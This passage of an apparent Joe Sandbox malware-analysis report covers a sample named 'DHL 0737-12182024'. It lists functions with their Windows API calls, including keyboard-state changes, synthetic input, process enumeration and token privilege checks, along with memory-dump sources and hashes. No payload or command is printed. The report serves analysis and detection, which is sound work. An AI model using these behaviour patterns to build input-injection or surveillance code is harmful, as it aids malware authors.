                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$socket
                                                                                            • String ID:
                                                                                            • API String ID: 1881357543-0
                                                                                            • Opcode ID: 54468ef96a3ac8715a43fbc16aec73448b1fbb2b03abfa43d26815667071358c
                                                                                            • Instruction ID: 609f34dc537c3c4d6b756774400e204ca66a8b7cc8d1d24f2da2592ea2f3d628
                                                                                            • Opcode Fuzzy Hash: 54468ef96a3ac8715a43fbc16aec73448b1fbb2b03abfa43d26815667071358c
                                                                                            • Instruction Fuzzy Hash: 9D41A134600210AFEB20AF28D88AF2977E5FB45718F548458F91ADF7D2D772DD828B91
                                                                                            Function 0085B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6d93ff2aab919c7b81b877015beecad5241ed2ca17f7365eeec202a97c07068
                                                                                            • Instruction ID: 600cebab1bdbe825ef17118a3b5e14019eb932e2c1d40ab6265db895d3e3d5a2
                                                                                            • Opcode Fuzzy Hash: c6d93ff2aab919c7b81b877015beecad5241ed2ca17f7365eeec202a97c07068
                                                                                            • Instruction Fuzzy Hash: 3A410672A00318AFD7249F7CCC41B6ABBA9FB98711F20452EF941DB282D771D9098781
                                                                                            Function 008956D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00895783
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 008957A9
                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 008957CE
                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 008957FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 3321077145-0
                                                                                            • Opcode ID: 43d9b0e79f323759a6dce83b3c97c6efaa0f443a24b3807edc42541edb0ce797
                                                                                            • Instruction ID: 1be55461fd3fa460a8e95add50c46ac12ea301b04482acea6fb774b006c728e9
                                                                                            • Opcode Fuzzy Hash: 43d9b0e79f323759a6dce83b3c97c6efaa0f443a24b3807edc42541edb0ce797
                                                                                            • Instruction Fuzzy Hash: 9F41EE35600610DFCB11EF59D545A5EBBE1FF89720B198498E84AAB362CB34FD41CB92
                                                                                            Function 0085D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00846D71,00000000,00000000,008482D9,?,008482D9,?,00000001,00846D71,8BE85006,00000001,008482D9,008482D9), ref: 0085D910
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0085D999
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0085D9AB
                                                                                            • __freea.LIBCMT ref: 0085D9B4
                                                                                              • Part of subcall function 00853820: RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                            • String ID:
                                                                                            • API String ID: 2652629310-0
                                                                                            • Opcode ID: 7df73daeec36bc5a9d7659ad8a6fd9a38b5d44cbdf75567d2249e79387570d77
                                                                                            • Instruction ID: 2b5fe8af29625cea84a48777520537c99dc8c913a5a8532a7cc63428d7c28600
                                                                                            • Opcode Fuzzy Hash: 7df73daeec36bc5a9d7659ad8a6fd9a38b5d44cbdf75567d2249e79387570d77
                                                                                            • Instruction Fuzzy Hash: 5A31B072A0020AABDF24DF69DC45EAE7FA5FB41311B054268FC04EB251EB35CD59CB91
                                                                                            Function 008B52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 008B5352
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B5375
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 008B5382
                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008B53A8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 3340791633-0
                                                                                            • Opcode ID: 3c84b0b417d6e09e3286f09a87673f99367382deae8d14d401319ff7872f4eb0
                                                                                            • Instruction ID: f0300fd892880ef7a98d97b13c5bd26cf0234e3c0b0128c90360a3908f9d6e03
                                                                                            • Opcode Fuzzy Hash: 3c84b0b417d6e09e3286f09a87673f99367382deae8d14d401319ff7872f4eb0
                                                                                            • Instruction Fuzzy Hash: AD319E34A55A0CEFEB309A14CC55FE977E5FB0E390F584102BA11D63E1C7B5A9809B52
                                                                                            Function 0088AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0088ABF1
                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 0088AC0D
                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 0088AC74
                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0088ACC6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                            • String ID:
                                                                                            • API String ID: 432972143-0
                                                                                            • Opcode ID: f15e64a07d736e7e4dc65a548028dfb294c5ef3a32e493dac38c5829b4ec079d
                                                                                            • Instruction ID: ee4283295170c4ace7978267ea78aad2518f7cf72f291125d941fa5f74e83b54
                                                                                            • Opcode Fuzzy Hash: f15e64a07d736e7e4dc65a548028dfb294c5ef3a32e493dac38c5829b4ec079d
                                                                                            • Instruction Fuzzy Hash: 8731F470A40618AFFB39AB69C804BFA7BA7FB89310F08431BE485E21D1C37599858752
                                                                                            Function 008B7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ClientToScreen.USER32(?,?), ref: 008B769A
                                                                                            • GetWindowRect.USER32(?,?), ref: 008B7710
                                                                                            • PtInRect.USER32(?,?,008B8B89), ref: 008B7720
                                                                                            • MessageBeep.USER32(00000000), ref: 008B778C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1352109105-0
                                                                                            • Opcode ID: c45055e7863b4f01507cb4944725e14525a1d8a32594a8a1aeaad75162d76109
                                                                                            • Instruction ID: b57d631b1348e9600e345803998ee89deef4bd6b187af3fe26bcee1ddffe6ee7
                                                                                            • Opcode Fuzzy Hash: c45055e7863b4f01507cb4944725e14525a1d8a32594a8a1aeaad75162d76109
                                                                                            • Instruction Fuzzy Hash: 11418934A09354DFDB11CF68C898EE9BBF4FB99304F1541A8E815DB361CB70A941CB90
                                                                                            Function 008B16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32 ref: 008B16EB
                                                                                              • Part of subcall function 00883A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00883A57
                                                                                              • Part of subcall function 00883A3D: GetCurrentThreadId.KERNEL32 ref: 00883A5E
                                                                                              • Part of subcall function 00883A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008825B3), ref: 00883A65
                                                                                            • GetCaretPos.USER32(?), ref: 008B16FF
                                                                                            • ClientToScreen.USER32(00000000,?), ref: 008B174C
                                                                                            • GetForegroundWindow.USER32 ref: 008B1752
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                            • String ID:
                                                                                            • API String ID: 2759813231-0
                                                                                            • Opcode ID: 73ff15e8bd002f8c760c4106c77059e260bd641c5f30dc87514c3ffb5385b50e
                                                                                            • Instruction ID: 3e0bea035d906cbf4e32e67c3160e62859b550625f9d459b113342bafd094e56
                                                                                            • Opcode Fuzzy Hash: 73ff15e8bd002f8c760c4106c77059e260bd641c5f30dc87514c3ffb5385b50e
                                                                                            • Instruction Fuzzy Hash: D7316F71D00159AFCB00EFA9D885CEEBBF9FF48304B5080A9E415E7211EB319E45CBA1
                                                                                            Function 0088D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0088D501
                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0088D50F
                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0088D52F
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0088D5DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 420147892-0
                                                                                            • Opcode ID: ef5266b9ec9d56ea10e77f78bf9565a82b42f6e1192acebf87bba9fbffb1157c
                                                                                            • Instruction ID: e7b8cb62fcd5ef9511986840314f6378a2976ffca4c7f26900a97558ebe487b2
                                                                                            • Opcode Fuzzy Hash: ef5266b9ec9d56ea10e77f78bf9565a82b42f6e1192acebf87bba9fbffb1157c
                                                                                            • Instruction Fuzzy Hash: 9D3191711083009FD304EF58D885AAFBBE8FF99354F14092DF581D61A1EB719989CB93
                                                                                            Function 008B8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • GetCursorPos.USER32(?), ref: 008B9001
                                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00877711,?,?,?,?,?), ref: 008B9016
                                                                                            • GetCursorPos.USER32(?), ref: 008B905E
                                                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00877711,?,?,?), ref: 008B9094
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2864067406-0
                                                                                            • Opcode ID: fd47ff73b36a0e18a4fbcaf062d42661647906020793a67eada34099f792c63c
                                                                                            • Instruction ID: 9a1167df6578cf52f5d6e71409125919cb14cb8d70ef43f18bbc45c8cd83a9ed
                                                                                            • Opcode Fuzzy Hash: fd47ff73b36a0e18a4fbcaf062d42661647906020793a67eada34099f792c63c
                                                                                            • Instruction Fuzzy Hash: 76219F35600418EFCB259FA4C898EFA7BF9FB8A360F044165FA4587262D3719951DBA0
                                                                                            Function 0088D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNEL32(?,008BCB68), ref: 0088D2FB
                                                                                            • GetLastError.KERNEL32 ref: 0088D30A
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0088D319
                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,008BCB68), ref: 0088D376
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 2267087916-0
                                                                                            • Opcode ID: ed0ed07d8a77829bd2820639c70a4236ffe9e8892e76323bdd57f64c1ffb6002
                                                                                            • Instruction ID: 04cf3059233d0695b966763cf5b6de8f0a0c1f5d846418a7bc33fbd9c0e9eae7
                                                                                            • Opcode Fuzzy Hash: ed0ed07d8a77829bd2820639c70a4236ffe9e8892e76323bdd57f64c1ffb6002
                                                                                            • Instruction Fuzzy Hash: 94215C705093019F8710EF28D8818AEB7E4FE5A364F504A2DF4A9C73E1E7319946CB93
                                                                                            Function 00881571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00881014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0088102A
                                                                                              • Part of subcall function 00881014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00881036
                                                                                              • Part of subcall function 00881014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881045
                                                                                              • Part of subcall function 00881014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0088104C
                                                                                              • Part of subcall function 00881014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00881062
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008815BE
                                                                                            • _memcmp.LIBVCRUNTIME ref: 008815E1
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00881617
                                                                                            • HeapFree.KERNEL32(00000000), ref: 0088161E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 1592001646-0
                                                                                            • Opcode ID: a76a77a00e4946088e7e3d9f981742f0e2778bf5e7a7799535bf1177b54a586f
                                                                                            • Instruction ID: 8683abfe7c29d669094ce87dc538a2c24780d2667ebc96d62fb76e307f553cbb
                                                                                            • Opcode Fuzzy Hash: a76a77a00e4946088e7e3d9f981742f0e2778bf5e7a7799535bf1177b54a586f
                                                                                            • Instruction Fuzzy Hash: 1F212771E40109AFDF10EFA4C949BEEB7B8FF54354F184459E441EB241EB30AA46CBA0
                                                                                            Function 008B2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 008B280A
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008B2824
                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008B2832
                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008B2840
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                            • String ID:
                                                                                            • API String ID: 2169480361-0
                                                                                            • Opcode ID: d2d98cb2313bea6ac12fea3ff7a37a67ad76466e47176d2706961c03b882e148
                                                                                            • Instruction ID: b7f371e5106fc49609008362dac242447d7a42a056a2002ca0c31d168ac7f3a4
                                                                                            • Opcode Fuzzy Hash: d2d98cb2313bea6ac12fea3ff7a37a67ad76466e47176d2706961c03b882e148
                                                                                            • Instruction Fuzzy Hash: 02219D31205525AFD7249B28C845FAA7B99FF85324F148258F426CB7E2CB71FC82CB95
                                                                                            Function 008878F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00888D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0088790A,?,000000FF,?,00888754,00000000,?,0000001C,?,?), ref: 00888D8C
                                                                                              • Part of subcall function 00888D7D: lstrcpyW.KERNEL32(00000000,?,?,0088790A,?,000000FF,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00888DB2
                                                                                              • Part of subcall function 00888D7D: lstrcmpiW.KERNEL32(00000000,?,0088790A,?,000000FF,?,00888754,00000000,?,0000001C,?,?), ref: 00888DE3
                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00887923
                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00887949
                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00888754,00000000,?,0000001C,?,?,00000000), ref: 00887984
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                            • String ID: cdecl
                                                                                            • API String ID: 4031866154-3896280584
                                                                                            • Opcode ID: 02daf9095cc76d42531b7db46ccf502bb99a6761b846e0c88ccfbdd774992ae2
                                                                                            • Instruction ID: 6f916404bb4b55d4f46d60b5839c0aca88bccadf907875bedf495534fe6a1b3b
                                                                                            • Opcode Fuzzy Hash: 02daf9095cc76d42531b7db46ccf502bb99a6761b846e0c88ccfbdd774992ae2
                                                                                            • Instruction Fuzzy Hash: 4C11D63A200242ABCB15AF39DC45D7A7BB9FF85390B50402AF946CB365EF35D811C791
                                                                                            Function 008B7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 008B7D0B
                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 008B7D2A
                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 008B7D42
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0089B7AD,00000000), ref: 008B7D6B
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
